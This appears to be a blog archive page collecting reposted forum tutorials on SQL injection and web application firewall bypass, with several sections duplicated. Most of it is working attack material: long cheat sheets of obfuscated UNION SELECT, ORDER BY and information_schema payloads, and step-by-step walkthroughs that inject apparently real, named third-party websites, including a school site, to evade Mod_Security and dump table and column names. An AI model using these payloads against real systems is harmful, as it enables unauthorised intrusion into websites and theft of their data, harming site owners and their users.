Newest Post
Archive for Februari 2017
Now ill show different waf's we face while we inject sites in some examples ::
example (1)
http://www.site.com/php?id=2 uNiOn-- - [waf]
http://www.site.com/php?id=2 SeLeCt -- - [no waf]
so here the word blocked by firewall is word "uNiOn" so ur query should be like
http://www.site.com/php?id=2 /*!50000uNiOn*/ select 1,2,3,4,5-- -
note:: some times using combination of uppercase and lowercase will bypass waf
" so always use a combination of uppercase and lowercase"
like >> uNiOn SeLeCt.***
example (2)
http://www.site.com/php?id=2 uNiOn-- - [no waf]
http://www.site.com/php?id=2 SeLeCt-- - [no waf]
http://www.site.com/php?id=2 uNiOn SeLeCt [waf]
so here firewall is blocking the combine use of union and select so the waf bypass should be applied in between union and select words
http://www.site.com/php?id=2 uNiOn DISTINCTROW SeLeCt 1,2,3,4,5-- -
(or)
http://www.site.com/php?id=2 uNiOn%23%0ASeLeCt 1,2,3,4,5-- -
%23 => url encoded form of #
and
%0A => line feed
%23 will terminate the query so using a linefeed (%0A) will make our query work
some times even after using
http://www.site.com/php?id=2 uNiOn DISTINCTROW SeLeCt 1,2,3,4,5-- - [waf]
it blocks the query so better use
http://www.site.com/php?id=2 /*!50000uNiOn*/ DISTINCTROW SeLeCt 1,2,3,4,5-- -
example (3)
http://www.site.com/php?id=2 uNiOn-- - [waf]
http://www.site.com/php?id=2 SeLeCt-- - [no waf]
http://www.site.com/php?id=2 uNiOn SeLeCt-- - [waf]
now lets try to bypass this
http://www.site.com/php?id=2 /*!50000uNiOn*/ SeLeCt-- - [waf]
http://www.site.com/php?id=2 /*!50000uNiOn*/ DISTINCTROW SeLeCt-- - [waf]
now lets try using url encoding
http://www.site.com/php?id=2 %75nIOn SeLeCt -- -[waf]
http://www.site.com/php?id=2 %75nIOn %73eLeCt-- - [no waf]
here %75 => u and %73 => s {url encoded form}
example (4)
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,2,3,4,5-- - [waf]
lets go step by step
http://www.site.com/php?id=2 /*!50000union*/-- - [no waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/-- - [no waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1-- - [no waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,2-- - [waf]
if u observe waf apppread after using a comma (,) .Lets try to bypass this
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,~~2-- - (no waf)
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,~~2,~~3,~~4,~~5-- - [bypassed]
(or)
http://www.site.com/php?id=2 uNiOn(/**_**/(seLeCt(1),(2),(3),(4),(5))-- - [bypassed]
example (5)
i see some injectors using uNunionIOn without knowing the purpose of using it.***
when u have to use uNunionIOn ?
lets see
if u observe when ever our query is incomplete site will show an error on page
example
http://www.cobranet.org/about.php?id=1 union-- -
result >>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
ur getting this error because ur query is incomplete but in some sites when u use
http://www.site.com/php?id=2 union-- -
result >> page doesnot show any error and the page load normally it mean the
word union is being removed or escaped from our query in such case we can use
uNuNionNion
and in some sites specific letters will be escaped ******
lets see this on a live site
http://zixem.altervista.org/SQLi/level3.php?item=3' uNiOn-- -
result >>
You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near 'uni-- -'' at line 1
from the above error u can see some letters in the word union are being escaped
so the letters being escpaed have to be used twice to bypass this
http://zixem.altervista.org/SQLi/level3.php?item=3' uNiOnon-- - [bypassed]
result >> You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near '' at line 1
http://zixem.altervista.org/SQLi/level3.php?item=-3' uNiOnon select 1,2,3,4-- -
and we got the vulnerable coloumns.***
example (6)
some times we can see union or select word doesnot get bypassed even after we tried all the alternatives to bypass then using of some special characters may bypass the waf.***
uni<>on sel<>ect
uni*on sel*ect
(uni)(on) (sel)(ect)
uni[]on sel[]ect
uni\on sel\ect etc.************
example (7)
in some sites we face white space block means when ever we use a space there
will be a waf there we can use odd number of apostrophes /* in between spaces
or we can use
%0b
%0d
%C0 etc
>> www.site.com/php?id=2/*****/uNiOn/*****/select/*****/1,2,3,4,5-- -
www.site.com/php?id=2%0bunion%0bselect%0b1,2,3,4,5-- - etc
tutorial is getting bigger so ill continue this tutorial in the second part of the waf bypassing
hope u understood
[credits to masters yogesh bhagat sir,geek kid, aakash choudhary i learned waf bypassing from these people]
plzz give ur feedback about my tutorial thank u ******
cyaaa.***
source http://forum.sqliwiki.com/showthread.php?tid=4001
[~] order by [~]
----------------
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/
[~] UNION select [~]
--------------------
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+ #?uNiOn + #?sEleCt
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+?UnI?On?+'SeL?ECT?
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^****union.*$/ /^****select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
[~] information_schema.tables [~]
---------------------------------
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
[~] concat() [~]
----------------
CoNcAt()
concat()
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))
[~] group_concat() [~]
----------------------
/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)
[~] after id no. like id=1 +/*!and*/+1=0 [~]
--------------------------------------------
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
thanks
source
----------------
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/
[~] UNION select [~]
--------------------
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+ #?uNiOn + #?sEleCt
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+?UnI?On?+'SeL?ECT?
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^****union.*$/ /^****select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
[~] information_schema.tables [~]
---------------------------------
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
[~] concat() [~]
----------------
CoNcAt()
concat()
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))
[~] group_concat() [~]
----------------------
/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)
[~] after id no. like id=1 +/*!and*/+1=0 [~]
--------------------------------------------
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
thanks
source
hello frnds,
today we will discuss about how to bypass hard waf filters with local varaible when regular formats for dumping data are not working then this is a best alternative to try to bypass hard filters and it wont work everytime ******
ok lets start.***
ill explain it on a live site,
site>> http://www.kantipurinternational.edu.np/ pages /facilities_details.php?id=8
and i got the vulnerable coloumns
http://www.kantipurinternational.edu.np/ pages/ facilities_details.php?id=.8' /*!50000UNION*/+SELECT+1,2,3,4--+
and lets dump tables and coloumns
http://www.kantipurinternational.edu.np/ pages/ facilities_details.php?id=.8' /*!50000UNION*/+SELECT+1,2,export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2),4--+
result >> 403 forbidden
we have tried all the ways to bypass waf but didnt worked, now lets try with local variable.***
Local variable is a simply a value holder, it will hold a certain value and it will give output when command is executed,so lets see it practically,
see the below query i opned a variable with name "sqli" and stored a value there , and i placed that variable in the vulnerable coloumn which will show output when query is executed.***
http://www.kantipurinternational.edu.np/ pages /facilities_details.php?id=.8' and @sqli:=(seLeCt concat/**/(version())) /*!50000UNION*/+SELECT+1,2,@sqli,4--+
output
![[Image: vxu1l.png]](https://i68.tinypic.com/vxu1l.png)
like wise now lets dump data [tables and coloumns]
http://www.kantipurinternational.edu.np/....php?id=.8' and @sqli:=(select /*!50000GrOUp_ConCat(0x3c6c693e,/*!50000table_naMe*/,0x20203a3a2020,/*!50000ColuMN_naMe*/) FrOm /*!50000information_schema.columns*/ where table_schema=database/**_**/()) /*!50000UNION*/+SELECT+1,2,@sqli,4--+
and the output
![[Image: 2q8964g.png]](https://i65.tinypic.com/2q8964g.png)
hope u are clear with this and thats all for this tutorial
my next tutorial will be on bypassing hard waf filters with cookie based injection.***
plzz give ur feedback about my tutorial
thank u
cyaa !
today we will discuss about how to bypass hard waf filters with local varaible when regular formats for dumping data are not working then this is a best alternative to try to bypass hard filters and it wont work everytime ******
ok lets start.***
ill explain it on a live site,
site>> http://www.kantipurinternational.edu.np/ pages /facilities_details.php?id=8
and i got the vulnerable coloumns
http://www.kantipurinternational.edu.np/ pages/ facilities_details.php?id=.8' /*!50000UNION*/+SELECT+1,2,3,4--+
and lets dump tables and coloumns
http://www.kantipurinternational.edu.np/ pages/ facilities_details.php?id=.8' /*!50000UNION*/+SELECT+1,2,export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2),4--+
result >> 403 forbidden
we have tried all the ways to bypass waf but didnt worked, now lets try with local variable.***
Local variable is a simply a value holder, it will hold a certain value and it will give output when command is executed,so lets see it practically,
see the below query i opned a variable with name "sqli" and stored a value there , and i placed that variable in the vulnerable coloumn which will show output when query is executed.***
http://www.kantipurinternational.edu.np/ pages /facilities_details.php?id=.8' and @sqli:=(seLeCt concat/**/(version())) /*!50000UNION*/+SELECT+1,2,@sqli,4--+
output
like wise now lets dump data [tables and coloumns]
http://www.kantipurinternational.edu.np/....php?id=.8' and @sqli:=(select /*!50000GrOUp_ConCat(0x3c6c693e,/*!50000table_naMe*/,0x20203a3a2020,/*!50000ColuMN_naMe*/) FrOm /*!50000information_schema.columns*/ where table_schema=database/**_**/()) /*!50000UNION*/+SELECT+1,2,@sqli,4--+
and the output
hope u are clear with this and thats all for this tutorial
my next tutorial will be on bypassing hard waf filters with cookie based injection.***
plzz give ur feedback about my tutorial
thank u
cyaa !
source http://forum.sqliwiki.com/showthread.php?tid=4164
Hello
Today i'm going to show you sqli (variable) method.***
ok let's start :
1. 1st we will try to balance query
site: http://www.unmpress.com/shell.php?Page=catalog
so we will put ( \ ) back slash in catalog
site give us a error
pic: http://prntscr.com/8nzhm2
ok now trying to fix this error
http://www.unmpress.com/shell.php?Page=catalog') -- -
Done
query successfully fixed
pic: http://prntscr.com/8nzidy
ok now trying to inject this site
1st we will find total Column
http://www.unmpress.com/shell.php?Page=catalog') order by 1 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 2 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 3 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 4 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 5 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 6 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 7 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 8 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 9 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 10 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 11 -- - [ error ]
pic: http://prntscr.com/8nziwo
so it's mean Total column is 10
ok now we will fin vulnerable column
http://www.unmpress.com/shell.php?Page=catalog') and 0 union select 1,2,3,4,5,6,7,8,9,10 -- -
Not Acceptable!
Not Acceptable!
An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.
Pic: http://prntscr.com/8nzk9t
don't worry we will try to bypass it ******
done ****** Successfully bypassed
site: http://www.unmpress.com/shell.php?Page=catalog') and 0 /*!50000union*/ /*!50000select*/ 1,2,3,4,5,6,7,8,9,10 -- -
pic: http://prntscr.com/8nzlb7
we found total 3 column vulnerable
column 9,3,4
pic: http://prntscr.com/8nzlr6
now try to do dios in any table ******
i use dios in number 3 vulnerable column
but it's not working ******
ok now we will try something different.*** now we will try to use Variable Method
as a example : and@x:=concat() union select 1,@x,3 -- -
and@x:= (@x it's variable)
you can use any word @c @b @m anything ***
and variable method writing example : (and) then your variable method like @x then ( semi colon then (=) a equal then your text or dios
and@x:=concat(database()) union select 1,@x,3 -- -
so if vulnerable column is 2 thenn it's show you database name coz you store database function in your variable ****** so you can print version,database,user etc.***
ok now we will try it in our vulnerable site
Done ****** we are success
pic: http://prntscr.com/8nznr3
and sorry for my Bad English :'(
Source http://forum.sqliwiki.com/showthread.php?tid=2
Today i'm going to show you sqli (variable) method.***
ok let's start :
1. 1st we will try to balance query
site: http://www.unmpress.com/shell.php?Page=catalog
so we will put ( \ ) back slash in catalog
site give us a error
pic: http://prntscr.com/8nzhm2
ok now trying to fix this error
http://www.unmpress.com/shell.php?Page=catalog') -- -
Done
query successfully fixed
pic: http://prntscr.com/8nzidy
ok now trying to inject this site
1st we will find total Column
http://www.unmpress.com/shell.php?Page=catalog') order by 1 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 2 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 3 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 4 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 5 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 6 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 7 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 8 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 9 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 10 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 11 -- - [ error ]
pic: http://prntscr.com/8nziwo
so it's mean Total column is 10
ok now we will fin vulnerable column
http://www.unmpress.com/shell.php?Page=catalog') and 0 union select 1,2,3,4,5,6,7,8,9,10 -- -
Not Acceptable!Not Acceptable!
An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.
Pic: http://prntscr.com/8nzk9t
don't worry we will try to bypass it ******
done ****** Successfully bypassedsite: http://www.unmpress.com/shell.php?Page=catalog') and 0 /*!50000union*/ /*!50000select*/ 1,2,3,4,5,6,7,8,9,10 -- -
pic: http://prntscr.com/8nzlb7
we found total 3 column vulnerable
column 9,3,4
pic: http://prntscr.com/8nzlr6
now try to do dios in any table ******
i use dios in number 3 vulnerable column
Code:
http://www.unmpress.com/shell.php?Page=catalog')
and 0 /*!50000union*/ /*!50000select*/
1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6,7,8,9,10
-- -but it's not working ******
ok now we will try something different.*** now we will try to use Variable Method
as a example : and@x:=concat() union select 1,@x,3 -- -
and@x:= (@x it's variable)
you can use any word @c @b @m anything ***
and variable method writing example : (and) then your variable method like @x then (
semi colon then (=) a equal then your text or diosand@x:=concat(database()) union select 1,@x,3 -- -
so if vulnerable column is 2 thenn it's show you database name coz you store database function in your variable ****** so you can print version,database,user etc.***
ok now we will try it in our vulnerable site
Code:
http://www.unmpress.com/shell.php?Page
=catalog%27%29%20%20+and@x:=concat+%280x3c62723e,0x3c62723e,0x696e6a65637465642062792072303074786630726333,0x3c62723e,0x557365723a3a3a3a,USER%28%29,0x3c62723e,0x44423a3a3a3a,DATABASE%28%29,0x3c62723e,0x56657273696f6e3a3a3a3a,VERSION%28%29,0x3c62723e,0x3c62723e,@:=0,%28select+count%28*%29/*!50000from*/information_schema.columns+where+table_schema=database%28%29+and@:=concat+%28@,0x3c6c693e,table_name,0x3a3a,column_name%29%29,@%29/*!50000UNION*/SELECT++1,2,3,@x,5,6,7,8,9,10%20--%20-Done ****** we are success
pic: http://prntscr.com/8nznr3
and sorry for my Bad English :'(
Source http://forum.sqliwiki.com/showthread.php?tid=2
--'- : +--+ / : -- - : --+- : /*
) order by 1-- -
') order by 1-- -
')order by 1%23%23
%')order by 1%23%23
Null' order by 100--+
Null' order by 9999--+
')group by 99-- -
'group by 119449-- -
'group/**/by/**/99%23%23
union select ByPassing method
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
+/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
+/*!u%6eion*/+/*!se%6cect*/+
/**/uniUNIONon/**/aALLll/**/selSELECTect/**/
1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
/*!50000%55nIoN*/+/*!50000%53eLeCt*/
union /*!50000%53elect*/
%55nion %53elect
+--+Union+--+Select+--+
+UnIoN/*&a=*/SeLeCT/*&a=*/
id=1+’UnI”On’+'SeL”ECT’
id=1+'UnI'||'on'+SeLeCT'
UnIoN SeLeCt CoNcAt(version())--
uNiOn aLl sElEcT
uUNIONnion all sSELECTelect
) order by 1-- -
') order by 1-- -
')order by 1%23%23
%')order by 1%23%23
Null' order by 100--+
Null' order by 9999--+
')group by 99-- -
'group by 119449-- -
'group/**/by/**/99%23%23
union select ByPassing method
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
+/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
+/*!u%6eion*/+/*!se%6cect*/+
/**/uniUNIONon/**/aALLll/**/selSELECTect/**/
1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
/*!50000%55nIoN*/+/*!50000%53eLeCt*/
union /*!50000%53elect*/
%55nion %53elect
+--+Union+--+Select+--+
+UnIoN/*&a=*/SeLeCT/*&a=*/
id=1+’UnI”On’+'SeL”ECT’
id=1+'UnI'||'on'+SeLeCT'
UnIoN SeLeCt CoNcAt(version())--
uNiOn aLl sElEcT
uUNIONnion all sSELECTelect
